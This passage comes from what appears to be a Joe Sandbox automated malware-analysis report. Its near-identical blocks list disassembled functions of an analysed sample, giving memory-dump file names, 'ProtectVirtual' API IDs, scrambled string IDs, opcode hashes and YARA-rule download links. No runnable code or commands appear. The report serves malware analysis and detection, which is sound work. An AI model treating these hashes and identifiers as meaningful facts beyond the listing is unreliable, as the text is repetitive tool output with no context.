                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 94ed5eeef712c6a959259cb5b8f5391f19ea3f9fbe821ad42c6fc3ab5eb4821c
                                                                                                                                                      • Instruction ID: b8acdf7308d6b49c1c337050b9d19dbe257c8f1b3eae7aa5982e5ef740dbfe66
                                                                                                                                                      • Opcode Fuzzy Hash: 94ed5eeef712c6a959259cb5b8f5391f19ea3f9fbe821ad42c6fc3ab5eb4821c
                                                                                                                                                      • Instruction Fuzzy Hash: 07F167A1C082949BF7208724DC85BEB7B79EF91310F1481FAD84D66281D27D4FC68B6B
                                                                                                                                                      Function 0040B095 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 436COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 6a2376788be7d587bcce8522af57323231a1ddc1010331dc67254713da04be75
                                                                                                                                                      • Instruction ID: faa1a34d37298e59c9a25781ba2a3a4b68259adcb83db6b2e4dbd1f49f2a147f
                                                                                                                                                      • Opcode Fuzzy Hash: 6a2376788be7d587bcce8522af57323231a1ddc1010331dc67254713da04be75
                                                                                                                                                      • Instruction Fuzzy Hash: 14E166A1C082949BF7208724DC85BEB7B79EF81310F1481FAD84D66281D27D4FC68B6B
                                                                                                                                                      Function 0040B035 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 429COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: d4626beada52873239c78c176c9c59c8ac6ecb2f3b2d49b7e3e685c3a31f536b
                                                                                                                                                      • Instruction ID: 20942be26a0bb1574d21cdffcfd82772a50fcfd8e16b7139ac4f6ebf2c59fc95
                                                                                                                                                      • Opcode Fuzzy Hash: d4626beada52873239c78c176c9c59c8ac6ecb2f3b2d49b7e3e685c3a31f536b
                                                                                                                                                      • Instruction Fuzzy Hash: D7E158A1D082949BF7218724DC857EB7B78EF91310F1481FAD84D66281D27D4FC68B6B
                                                                                                                                                      Function 0040B335 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 421COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: e10496b6a8ecc01e288818880832c162771d721495a16ba513804ab57015e00d
                                                                                                                                                      • Instruction ID: 01bf1487118900520c2c4ee157e84824dabc5311628179446bcc3d50be1815b7
                                                                                                                                                      • Opcode Fuzzy Hash: e10496b6a8ecc01e288818880832c162771d721495a16ba513804ab57015e00d
                                                                                                                                                      • Instruction Fuzzy Hash: DDE168A1C082949BF7218624DC85BEB7B78EF81310F1481FAD84D66281D27D5FC68B6B
                                                                                                                                                      Function 0040B0D9 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 417COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 94de6cb43ca6aa13e67ae836f7b547946d3dd5ec193af8d95458265d84d62e4c
                                                                                                                                                      • Instruction ID: 849cf98f0d9e8883edd505fd289fa4cf39ab600865f398a2a22228110a8db3d5
                                                                                                                                                      • Opcode Fuzzy Hash: 94de6cb43ca6aa13e67ae836f7b547946d3dd5ec193af8d95458265d84d62e4c
                                                                                                                                                      • Instruction Fuzzy Hash: 36E157A1C082949BF7218624DC85BEB7B79EF91310F1481FAD84D66281D27D4FC68B6B
                                                                                                                                                      Function 0040B342 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 416COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 4da81adb6ff54874ead631ba1653ea22455dc19add6efa080493e4757366d41a
                                                                                                                                                      • Instruction ID: 5db5ed6562b64ea0462ee99b5b7c6444358f02f3e63aec1b00d977781b5c55bf
                                                                                                                                                      • Opcode Fuzzy Hash: 4da81adb6ff54874ead631ba1653ea22455dc19add6efa080493e4757366d41a
                                                                                                                                                      • Instruction Fuzzy Hash: 82E167A1D082949BF7218724DC85BEB7B78EF91310F1481FAD84D66281D27D0FC68B6B
                                                                                                                                                      Function 0040B401 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 405COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: e38a752faa68d8b8616b1ef710dbf80f13c412000fa0c22030b5ff9bca409c90
                                                                                                                                                      • Instruction ID: 7a26878e1429824609114e8566e6b795f961bb7ace041d1e6cb9dac7be62f7eb
                                                                                                                                                      • Opcode Fuzzy Hash: e38a752faa68d8b8616b1ef710dbf80f13c412000fa0c22030b5ff9bca409c90
                                                                                                                                                      • Instruction Fuzzy Hash: B9E166A1C082949BF7218724DC85BEB7B79EF91310F1481FAD44D66281D27E1FC68BA7
                                                                                                                                                      Function 0040B410 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 402COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 6ad0aa7d12710ac61065b9be4e23e77e37743bc97611adc3db16428c67dd83ac
                                                                                                                                                      • Instruction ID: 70a33bfecfa557418bc060e572197bcbb6dc652cbf25d6133d418ddf569241ff
                                                                                                                                                      • Opcode Fuzzy Hash: 6ad0aa7d12710ac61065b9be4e23e77e37743bc97611adc3db16428c67dd83ac
                                                                                                                                                      • Instruction Fuzzy Hash: 2CE155A1D082949BF7218724DC85BEB7B79EF81310F1481FAD44D66281D27E1FC68B67
                                                                                                                                                      Function 0040B41F Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 401COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: 46bc8d4a4d3fca283f349a44071f52bd7a29a6439f1e4d7e66f3be0d53cb4c70
                                                                                                                                                      • Instruction ID: d4274db13835bcdff87d680cf6ecabf6aba49fd63204c7bd4018fda4a7829106
                                                                                                                                                      • Opcode Fuzzy Hash: 46bc8d4a4d3fca283f349a44071f52bd7a29a6439f1e4d7e66f3be0d53cb4c70
                                                                                                                                                      • Instruction Fuzzy Hash: D0E155A1D082949BF7218624DC85BEB7B79EF91310F1481FAD84D66281D27E0FC6CB67
                                                                                                                                                      Function 0040B459 Relevance: 49.4, APIs: 2, Strings: 26, Instructions: 382COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
